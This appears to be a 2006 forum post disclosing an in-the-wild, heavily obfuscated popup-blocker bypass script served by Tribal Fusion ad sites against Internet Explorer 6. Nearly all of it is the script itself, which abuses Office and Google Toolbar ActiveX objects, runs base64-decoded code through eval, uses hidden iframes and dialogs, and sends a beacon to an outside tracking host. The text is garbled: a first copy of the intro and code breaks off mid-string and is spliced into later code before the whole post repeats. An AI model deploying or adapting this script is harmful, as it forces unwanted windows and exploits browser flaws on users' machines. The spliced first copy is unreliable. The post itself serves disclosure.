Tribal Fusion and other advertising sites are using virtually identical
copies of a multi-exploit popup blocker bypass script. The script uses
exploits of ocget.dll, OffProv11 and OfficeObj10 classes, the Google
Toolbar, and JavaScript within a Shockwave Flash file. Some exploits
look like a shortcoming in IE handling of MS Office integration.
The script is heavily obfuscated and I have not done a full analysis. I
did find a Securiteam partial analysis from last December at
http://blogs.securiteam.com/index.php/archives/138
The exploit is in the wild and appears to be common. Users of IE6 fully
patched except for Q912945 are being exploited. Not tested under any
other version.
contents as of 2006-03-22 13:46:00 UTC-0000 are below.
oV1=window; function fStart(u,n,v) { if (!oV1.opera) { var
twin=oV1.open(u,n,v); oV1.focus(); } if (!window.fV1) {fV13();} var
w=oV2(u,n,v); var wo=vWA[w]; wo.pw=twin; fV3("fV10(" + w + ")",100);
return wo; } function fV11() {return fV6(vV1);} function fV5(x) { return
true; } function oV2(u,n,v) { var c = vWA.length; vWA[c] = new Array;
var cw = vWA[c]; var tn=new Date(); if (!v) var v=''; if (!n) var
n=tn.getTime(); cw.location=u; cw.f=1; cw.s=0; cw.n=n; cw.v=v; cw.cn="";
cw.cnt=c; cw.blur=function() {cw.f=-1;}; cw.focus=function() {cw.f=1;};
return c } function fV13() { oV5=oV1.document; vWA=new Array;
fV1=oV1.open; fV2=oV1.focus; fV3=setTimeout; fV4=clearTimeout;
vV1='PE9CSkVDVCBJRD0nb1Y0JyBkYXRhPScvZmF2aWNvbi5pY28nIHR5cGU9J2FwcGxpY2F
NjcmlwdDpwYXJlbnQuZlYxMSgpIj48L0lGUkFNRT4=')); fV25=20;
fV3('fV12()',200); } function fV30() { fV3('fV32?fV29():fV28()'); var
o=document.createElement('object');
o.onreadystatechange=function(){fV32=1};
o.classid='clsid:D2BD7935-05FC-11D2-9059-00C04FD7A1BD';
o.onreadystatechange=function(){fV32=0}; } function fV29() {
fV3('fV31?fV28():fV33()'); var o=document.createElement('object');
o.onreadystatechange=function(){fV31=1};
o.classid='clsid:9E30754B-29A9-41CE-8892-70E9E07D15DC';
o.onreadystatechange=function(){fV31=0}; } function fV33() {
fV3('isG?fV16():fV26();'); var o=document.createElement('object');
o.onreadystatechange=function(){isG=1};
o.classid='clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB';
o.onreadystatechange=function(){isG=0}; } function fV7() {
oV5.body.onclick=function() {fV8(oV1.open,3)}; if (oV5.createElement) {
fV24=oV5.getElementById; if (fV34) return; if (fV20) { if (fV21) {
fV30(); } else { fV33(); } } else { out='<embed swliveconnect="true"
src="http://cdn1.tribalfusion.com/media/common/pop/pop.swf" width="1"
height="1">'; fV19(out); if (!oV5.all) { x=oV5.getElementById('oV6');
x.focus(); x.value=Math.random(); } } } } function fV8(f,t,y) { for (var
i=0;i<vWA.length;i++) if (vWA[i].s==0) { vWA[i].s=-1; var wo=vWA[i];
wo.pw=f(wo.location,wo.n,wo.v); fV3("var i="+i+"; var wo=vWA[i];
if(wo.s==-1){wo.s=0}"); fV9(wo,t); } } function fV9(wo,s) { if (!s) s=0;
if (wo.s > 1) return; if (s==0) var t=fV3("fV7()",500); if (s==5 && isG)
var t=fV3('fV26()',200); oV1.onerror=fV5; if (!oV1.opera)
{wo.f==-1?wo.pw.blur():wo.pw.focus();} if (wo.pw) { wo.s=2; fV2();
fV4(t);
eval(fV6('CQlpZiAoMSArIE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDEwMCkgPCA2KS
V0LmNvbS92ZXJzaW9uMi9oaXRfdHJpYmFsLmNmbT90eXBlPScgKyBzOw0KCQl9'));
oV1.onerror=null; } } function fV10(w) { if (oV1.opera && !fV20)
{fV7();return;} wo=vWA[w]; fV9(wo); }
var l = (screen.width - TF_PopWidth) / 2 ; var t = (screen.height -
TF_PopHeight) / 2 ; var pop =
fStart(TF_PopUrl,'','height='+TF_PopHeight+',width='+TF_PopWidth+',left=
Tribal Fusion and other advertising sites are using virtually identical
copies of a multi-exploit popup blocker bypass script. The script uses
exploits of ocget.dll, OffProv11 and OfficeObj10 classes, the Google
Toolbar, and JavaScript within a Shockwave Flash file. Some exploits
look like a shortcoming in IE handling of MS Office integration.
The script is heavily obfuscated and I have not done a full analysis. I
did find a Securiteam partial analysis from last December at
http://blogs.securiteam.com/index.php/archives/138
The exploit is in the wild and appears to be common. Users of IE6 fully
patched except for Q912945 are being exploited. Not tested under any
other version.
I found the hostile code at:
http://cdn5.tribalfusion.com/media/common/pop/pop-tf33.js
contents as of 2006-03-22 13:46:00 UTC-0000 are below.
oV1=window; function fStart(u,n,v) { if (!oV1.opera) { var
twin=oV1.open(u,n,v); oV1.focus(); } if (!window.fV1) {fV13();} var
w=oV2(u,n,v); var wo=vWA[w]; wo.pw=twin; fV3("fV10(" + w + ")",100);
return wo; } function fV11() {return fV6(vV1);} function fV5(x) { return
true; } function oV2(u,n,v) { var c = vWA.length; vWA[c] = new Array;
var cw = vWA[c]; var tn=new Date(); if (!v) var v=''; if (!n) var
n=tn.getTime(); cw.location=u; cw.f=1; cw.s=0; cw.n=n; cw.v=v; cw.cn="";
cw.cnt=c; cw.blur=function() {cw.f=-1;}; cw.focus=function() {cw.f=1;};
return c } function fV13() { oV5=oV1.document; vWA=new Array;
fV1=oV1.open; fV2=oV1.focus; fV3=setTimeout; fV4=clearTimeout;
vV1='PE9CSkVDVCBJRD0nb1Y0JyBkYXRhPScvZmF2aWNvbi5pY28nIHR5cGU9J2FwcGxpY2F
0aW9uL3htbCc+PC9PQkpFQ1Q+'; fV20=(document.all&&!oV1.opera)?1:0;
isG=fV31=fV32=0; fV21=fV20?(navigator.appVersion.indexOf('NT 5.1')>0):0;
fV34=fV20?(navigator.appVersion.indexOf('MSIE 7')>0):0;
oV5.write(fV6('PGlucHV0IHN0eWxlPSJ3aWR0aDowcHg7IHRvcDowcHg7IHBvc2l0aW9uO
mFic29sdXRlOyB2aXNpYmlsaXR5OmhpZGRlbjsiIGlkPSJvVjYiIG9uY2hhbmdlPSJmVjgoZ
lYxLDUsdHJ1ZSkiPg==')); oV5.write(fV6('PGRpdiBpZD0ib1YxMCI+PC9kaXY+'));
} function debug() {void(0)} function fV6(input) { var o = ""; var chr1,
chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; var keyStr =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); do { enc1 =
keyStr.indexOf(input.charAt(i++)); enc2 =
keyStr.indexOf(input.charAt(i++)); enc3 =
keyStr.indexOf(input.charAt(i++)); enc4 =
keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) |
enc4; o = o + String.fromCharCode(chr1); if (enc3 != 64) { o = o +
String.fromCharCode(chr2); } if (enc4 != 64) { o = o +
String.fromCharCode(chr3); } } while (i < input.length); return o; }
function fV12() { if (--fV25<1) return; oV1.onerror=fV5; var
t=fV3('fV12()',500); oV1.wO1=oV3.oV4.object.parentWindow;
oV3.location=fV6('YWJvdXQ6Ymxhbms='); fV3('fV8(wO1.open,2)',200);
fV4(t); } function fV17() { if (--fV25<1) { fV25=25; var
t=fV3('fV12()'); return; } var x=fV3('fV17()',250);
oV1.fV14=oV8.children[0].parentWindow; fV1=fV14.open; fV4(x);
oV8.removeChild(oV8.children[0]); oV5.all['oV6'].fireEvent('onchange');
} function fV16() { z=createPopup(); oV8=z.document.body;
oV8.innerHTML=fV6(vV1); fV25=5; fV3('fV17()',200); } function fV19(v) {
if (oV5.getElementById('oV10')) {
oV5.getElementById('oV10').innerHTML=v; } else { var
o=oV5.createElement("span"); o.innerHTML=v; o.style.visibility =
"visible"; oV5.body.appendChild(o); } } function fV23() { fV8(fV1,4); }
function fV22() { if (--fV25==0) {fV21=0; fV7(); return;} var wo=vWA[0];
var x=fV3('fV22()',750); var o=fV24('oV9'); if (o.DOM) { wo.s=-1;
fV4(x); fV25=1;
eval(fV6("dmFyIG91dD0ic2hvd01vZGFsRGlhbG9nKCdqYXZhc2NyaXB0OndpbmRvdy5vbm
Vycm9yPWZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9OyBzZXRUaW1lb3V0KFwid2luZG93LmNsb3
NlKClcIik7IHg9d2luZG93Lm9wZW4oXCJhYm91dDpibGFua1wiLFwiIiArIHdvLm4gKyAiXC
IsXCIiICsgd28udiArICJcIik7ICB4LmJsdXIoKTsgd2luZG93LmNsb3NlKCknLCcnLCdoZW
xwOjA7Y2VudGVyOjA7ZGlhbG9nV2lkdGg6MTtkaWFsb2dIZWlnaHQ6MTtkaWFsb2dMZWZ0Oj
UwMDA7ZGlhbG9nVG9wOjUwMDA7Jyk7Ijsgby5ET00uU2NyaXB0LmV4ZWNTY3JpcHQob3V0KT
s=")); wo.s=0; fV2(); fV3('fV23()'); } } function fV28() {
fV19(fV6('PG9iamVjdCBpZD0ib1Y5IiBvbmVycm9yPSJmVjI1PTEiIHN0eWxlPSJwb3NpdG
lvbjphYnNvbHV0ZTtsZWZ0OjE7dG9wOjE7d2lkdGg6MTtoZWlnaHQ6MSIgY2xhc3NpZD0iY2
xzaWQ6MkQzNjAyMDEtRkZGNS0xMWQxLThEMDMtMDBBMEM5NTlCQzBBIj48U0NSSVBUPmZWMj
U9MTwvU0NSSVBUPjwvb2JqZWN0Pg==')); fV25=6; fV3('fV22()',500) } function
fV26() {
fV19(fV6('PElGUkFNRSBpZD0ib1YzIiBOQU1FPSJvVjMiIFNUWUxFPSJ2aXNpYmlsaXR5Om
hpZGRlbjsgcG9zaXRpb246YWJzb2x1dGU7d2lkdGg6MTtoZWlnaHQ6MTsiIHNyYz0iamF2YX
NjcmlwdDpwYXJlbnQuZlYxMSgpIj48L0lGUkFNRT4=')); fV25=20;
fV3('fV12()',200); } function fV30() { fV3('fV32?fV29():fV28()'); var
o=document.createElement('object');
o.onreadystatechange=function(){fV32=1};
o.classid='clsid:D2BD7935-05FC-11D2-9059-00C04FD7A1BD';
o.onreadystatechange=function(){fV32=0}; } function fV29() {
fV3('fV31?fV28():fV33()'); var o=document.createElement('object');
o.onreadystatechange=function(){fV31=1};
o.classid='clsid:9E30754B-29A9-41CE-8892-70E9E07D15DC';
o.onreadystatechange=function(){fV31=0}; } function fV33() {
fV3('isG?fV16():fV26();'); var o=document.createElement('object');
o.onreadystatechange=function(){isG=1};
o.classid='clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB';
o.onreadystatechange=function(){isG=0}; } function fV7() {
oV5.body.onclick=function() {fV8(oV1.open,3)}; if (oV5.createElement) {
fV24=oV5.getElementById; if (fV34) return; if (fV20) { if (fV21) {
fV30(); } else { fV33(); } } else { out='<embed swliveconnect="true"
src="http://cdn1.tribalfusion.com/media/common/pop/pop.swf" width="1"
height="1">'; fV19(out); if (!oV5.all) { x=oV5.getElementById('oV6');
x.focus(); x.value=Math.random(); } } } } function fV8(f,t,y) { for (var
i=0;i<vWA.length;i++) if (vWA[i].s==0) { vWA[i].s=-1; var wo=vWA[i];
wo.pw=f(wo.location,wo.n,wo.v); fV3("var i="+i+"; var wo=vWA[i];
if(wo.s==-1){wo.s=0}"); fV9(wo,t); } } function fV9(wo,s) { if (!s) s=0;
if (wo.s > 1) return; if (s==0) var t=fV3("fV7()",500); if (s==5 && isG)
var t=fV3('fV26()',200); oV1.onerror=fV5; if (!oV1.opera)
{wo.f==-1?wo.pw.blur():wo.pw.focus();} if (wo.pw) { wo.s=2; fV2();
fV4(t);
eval(fV6('CQlpZiAoMSArIE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDEwMCkgPCA2KS
B7DQoJCQl2YXIgeD1uZXcgSW1hZ2UoKTsNCgkJCXguc3JjPSdodHRwOi8vd3d3LmFkb3V0cH
V0LmNvbS92ZXJzaW9uMi9oaXRfdHJpYmFsLmNmbT90eXBlPScgKyBzOw0KCQl9'));
oV1.onerror=null; } } function fV10(w) { if (oV1.opera && !fV20)
{fV7();return;} wo=vWA[w]; fV9(wo); }
var l = (screen.width - TF_PopWidth) / 2 ; var t = (screen.height -
TF_PopHeight) / 2 ; var pop =
fStart(TF_PopUrl,'','height='+TF_PopHeight+',width='+TF_PopWidth+',left=
'+l+',top='+t+',toolbar=0,status=0,menubar=0,scrollbars=0,resizable=0');
pop.blur();
window.focus();
[ reply ]